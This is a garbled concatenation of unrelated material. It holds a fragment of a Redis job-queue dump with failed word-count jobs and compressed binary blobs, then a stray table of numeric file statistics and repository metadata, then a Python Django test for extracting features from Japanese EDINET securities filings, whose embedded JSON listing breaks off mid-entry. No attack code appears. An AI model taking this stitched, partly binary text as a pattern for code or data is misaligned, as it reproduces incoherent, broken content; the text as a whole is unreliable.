pvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\x1a\xaa\xbf\x15x0\xae|'),
(b'rq:worker:453c31e48d0f4da58f90cfc13779d993', 52, b'\r\xc3@\xc9@\xea\x04\xea\x00\x00\x00\xcc \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:30.7\x1683067Z\x1d\x0elast_heartbeat\x10\xe0\x0c,\x0180 B\x1f2Z\x1d\x06queues\x08\x04high\x06\x03pid\x05\xc0;5\x04\x08hostn\x1fame\n\x08parabook\n\x05state\x07\x04idle\x06\x10fail\x1fed_job_count\x12\xf2\x02\x12total_working_ti\x0eme\x14\x080.001517\n\x05d \x8c\xe0\x0e\xba \x8d\x04318Z\xff\x08\x00Y\xe1\x04L\x06\t\x0ec'),
(b'rq:job:1fbc9695-c0a7-4302-8a77-9304ca86057b', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.131501Z\nstarted_at\x1b2019-08-12T20:49:20.022097Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:20.023750Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.131776Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00E\x19Nq\x83\xcc\xd5['),
(b'rq:clean_registries:high', 799, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:clean_registries:low', 790, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:job:95ae312d-3ae6-4846-9d9a-c7cdb36254ba', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.034930Z\nstarted_at\x1b2019-08-12T20:47:58.642547Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:58.644125Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.035242Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa7\x7f\x8f\xfa\xc7\xdf\xc9\xaf'),
(b'rq:job:f9f7c364-3f6d-4326-b724-c6f6983b05bb', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.941830Z\nstarted_at\x1b2019-08-12T20:47:54.862943Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:54.864504Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.942075Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00R\x88\x9f\xc5<\xf1\xfc\xb6'),
(b'rq:job:0b8e247a-81f6-4de2-8fde-080a2518b5bc', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.323621Z\nstarted_at\x1b2019-08-12T20:49:24.623319Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:24.624919Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.323981Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xdb\xea\x01k\x13o\xd6X'),
(b'rq:failed:high', 0, b'\x0c@\x8f\x8f\x00\x00\x00\x88\x00\x00\x00\x06\x00\x00$95ae312d-3ae6-4846-9d9a-c7cdb36254ba&\xd0\xfe\x033_\x06$0b8e247a-81f6-4de2-8fde-080a2518b5bc&\xd0T\x043_\x06$bcb5774c-24c6-4d99-a45d-cf9c9d560571&\xd0Z\x043_\xff\x08\x00\x8d\x1a\xa0\x94\x19;\x89-'),
(b'rq:job:fd4c7c24-6a46-465c-a2fa-14f5198725f9', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.226935Z\nstarted_at\x1b2019-08-12T20:49:22.185414Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:22.187037Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.227177Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00w\x97\xe8\\O>\xa8\x90'),
(b'rq:worker:09d8021f5de845a69b713b1fed130fed', 43, b'\r\xc3@\xca@\xec\x04\xec\x00\x00\x00\xce \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:22.1\x1669644Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f93651Z\x1d\x06queues\x08\x06medium\x08\x03pid\x05\xc025\x04\x1f\x08hostname\n\x08parabook\n\x05state\x07\x04idle\x1f\x06\x10failed_job_count\x12\xf2\x02\x12total_work\x14ing_time\x14\x080.001623\n\x05d \x8e\xe0\x0f\xbc\x0693997Z\xff\x08\x00s\xc2s\x106\xa1\x97^'),
(b'rq:clean_registries:medium', 795, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:failed:medium', 0, b"\x0c@\x8f\x8f\x00\x00\x00\x88\x00\x00\x00\x06\x00\x00$f9f7c364-3f6d-4326-b724-c6f6983b05bb&\xd0\xfa\x033_\x06$fd4c7c24-6a46-465c-a2fa-14f5198725f9&\xd0R\x043_\x06$1b2b1887-d608-4662-86fa-560d7b575fd0&\xd0X\x043_\xff\x08\x00J\xba\x1f\n\xe3'')"),
(b'rq:queues', 0, b'\x02\x03\x0frq:queue:medium\x0crq:queue:low\rrq:queue:high\x08\x00-\x1cw\x14lM\xc4\x1c'),
(b'rq:job:acfa2647-5e40-4510-9e8c-303df1dbc757', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.840834Z\nstarted_at\x1b2019-08-12T20:47:49.932673Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:49.935693Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.841263Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa0v\xb06\x8fb\x12\xf5'),
(b'rq:job:1b2b1887-d608-4662-86fa-560d7b575fd0', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.511490Z\nstarted_at\x1b2019-08-12T20:49:28.140359Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:28.142201Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.511732Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xc9*\xcb \xb6d\x11y'),
(b'rq:worker:2dba88aae2b54c90b87c74c89d458acc', 49, b'\r\xc3@\xca@\xec\x04\xec\x00\x00\x00\xce \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:28.1\x1624871Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f48542Z\x1d\x06queues\x08\x06medium\x08\x03pid\x05\xc095\x04\x1f\x08hostname\n\x08parabook\n\x05state\x07\x04idle\x1f\x06\x10failed_job_count\x12\xf2\x02\x12total_work\x14ing_time\x14\x080.001842\n\x05d \x8e\xe0\x0f\xbc\x0648931Z\xff\x08\x00.\x18\x1d^\x7f\xe0\x02\x83'),
(b'rq:failed:low', 0, b'\x0c@\x8f\x8f\x00\x00\x00\x88\x00\x00\x00\x06\x00\x00$acfa2647-5e40-4510-9e8c-303df1dbc757&\xd0\xf5\x033_\x06$1fbc9695-c0a7-4302-8a77-9304ca86057b&\xd0P\x043_\x06$91478a7d-9165-43b5-8f5a-f91a37a8feea&\xd0V\x043_\xff\x08\x00\xcbS\xd3\xebb\xbb\x9f\x8d'),
]
| 501.179104
| 1,441
| 0.761041
| 6,603
| 33,579
| 3.832197
| 0.081781
| 0.030944
| 0.048135
| 0.04932
| 0.926691
| 0.911595
| 0.890255
| 0.869112
| 0.861247
| 0.855794
| 0
| 0.282751
| 0.013639
| 33,579
| 66
| 1,442
| 508.772727
| 0.481235
| 0
| 0
| 0.333333
| 0
| 1.174603
| 0.830668
| 0.823521
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
10c81ce807c20fd328f0b631f35915ac7b4ae99b
| 254,647
|
py
|
Python
|
src/edinet/app/eagle/tests/test_edinet_feature_extractor.py
|
ryuichi1208/air-pipeline
|
eac5cad9f089e41ed5aace2fdaf0aff3696efb09
|
[
"Apache-2.0"
] | 5
|
2019-12-01T07:50:04.000Z
|
2021-06-01T02:04:22.000Z
|
airflow_ml/edinet_flow/app/eagle/tests/test_edinet_feature_extractor.py
|
icoxfog417/airflow-ml-exercises
|
9fc1072a38be7a014ba2ec1a955d96b87c03e104
|
[
"MIT"
] | 13
|
2019-12-04T23:09:46.000Z
|
2022-03-01T23:10:31.000Z
|
airflow_ml/edinet_flow/app/eagle/tests/test_edinet_feature_extractor.py
|
icoxfog417/airflow-ml-exercises
|
9fc1072a38be7a014ba2ec1a955d96b87c03e104
|
[
"MIT"
] | 2
|
2020-05-22T14:27:49.000Z
|
2020-10-09T03:20:50.000Z
|
import os
import shutil
import json
from django.test import TransactionTestCase
import edinet
from eagle.service import EDINETDocumentRegister
from eagle.service import EDINETFeatureExtractor
from eagle.models import NumberOfExecutives
class TestEDINETFeatureExtractor(TransactionTestCase):
DATA_DIR = os.path.join(os.path.dirname(__file__), "./data")
def setUpData(self, document_types, count=-1):
if not os.path.exists(self.DATA_DIR):
os.mkdir(self.DATA_DIR)
document_list = json.loads(LISTS.strip())
documents = edinet.models.Documents.create(document_list)
targets = [d for d in documents.list
if d.doc_type_code in document_types
and d.ordinance_code == "010"]
if count > 0:
targets = targets[:count]
service = EDINETDocumentRegister()
registered = []
for t in targets:
xbrl = t.document_id + "_1.xbrl"
pdf = t.document_id + "_2.pdf"
xbrl_path = os.path.join(self.DATA_DIR, xbrl)
pdf_path = os.path.join(self.DATA_DIR, pdf)
print(t.document_id)
if not os.path.exists(xbrl_path):
if t.has_xbrl:
t.get_xbrl(save_dir=self.DATA_DIR)
else:
xbrl_path = ""
if not os.path.exists(pdf_path):
if t.has_pdf:
t.get_pdf(save_dir=self.DATA_DIR)
else:
pdf_path = ""
r = service.register_document(t, xbrl_path, pdf_path)
registered.append(r)
return targets, registered
def test_extract_feature(self):
targets, registered = self.setUpData(("120",))
assert len(targets) > 0
self.assertEqual(len(targets), len(registered))
class StorageMock():
def download_file(self, source, target):
shutil.copyfile(source, target)
service = EDINETFeatureExtractor(StorageMock())
feature_name = "executive_state.number_of_executives"
for d in registered:
results = service.extract_feature(
d, feature_name, dryrun=True)
self.assertTrue(feature_name in results)
self.assertTrue(
isinstance(results[feature_name], NumberOfExecutives))
self.assertGreater(results[feature_name].value, 0)
LISTS = """
{
"metadata":
{
"title": "提出された書類を把握するためのAPI",
"parameter":
{
"date": "2018-09-10",
"type": "2"
},
"resultset":
{
"count": 251
},
"processDateTime": "2019-06-21 00:09",
"status": "200",
"message": "OK"
},
"results": [
{
"seqNumber": 1,
"docID": "S100E1Y3",
"edinetCode": "E12448",
"secCode": null,
"JCN": "8010401040306",
"filerName": "明治安田アセットマネジメント株式会社",
"fundCode": "G10139",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:00",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 2,
"docID": "S100E2YB",
"edinetCode": "E25036",
"secCode": null,
"JCN": null,
"filerName": "馬渕 喬",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:00",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E01944",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1PB",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 3,
"docID": "S100E1EU",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05301",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "半期報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 4,
"docID": "S100E01G",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11833",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第29期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 5,
"docID": "S100E1Y5",
"edinetCode": "E12448",
"secCode": null,
"JCN": "8010401040306",
"filerName": "明治安田アセットマネジメント株式会社",
"fundCode": "G10386",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:00",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 6,
"docID": "S100E0GV",
"edinetCode": "E06748",
"secCode": null,
"JCN": "2010001049257",
"filerName": "大和証券投資信託委託株式会社",
"fundCode": "G12816",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-18",
"periodEnd": "2018-09-18",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "半期報告書(内国投資信託受益証券)-第1期(平成29年12月18日-平成30年9月18日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 7,
